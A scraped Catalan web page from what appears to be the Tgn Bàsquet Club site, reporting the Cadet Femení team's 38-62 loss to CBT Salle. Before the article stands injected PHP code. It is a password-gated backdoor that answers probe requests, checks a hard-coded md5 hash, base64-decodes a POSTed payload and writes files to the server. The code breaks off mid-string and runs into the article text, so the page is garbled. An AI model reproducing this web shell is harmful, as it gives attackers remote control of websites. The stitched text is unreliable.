function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Femení lila, tot i l’esforç, va ser derrotat pel CBT Salle (38-62) - Tgn Bàsquet Club -

El Cadet Femení lila, tot i l’esforç, va ser derrotat pel CBT Salle (38-62)

Updated: octubre 14, 2021

El Cadet Femení Lila va perdre contra el CBT Salle tot i el bon inici i els seus esforços. Les del TGN van començar amb ganes el seu primer partit de lliga. Les ganes de competir que tenien les liles les va permetre acabar el primer quart 9-8, el que preveia un partit ajustat. Però a partir del segon quart les visitants van apujar el ritme defensiu i les liles no van saber reaccionar, es van col·lapsar en atac i defensivament es van veure moltes mancances. Les rivals van aprofitar la baixada de les jugadores entrenades per Pastó, per agafar distància al marcador. A l’últim quart van tirar d’orgull i van fer un molt bon parcial de 17-12, tot i que ja no va servir per agafar a les del CBT.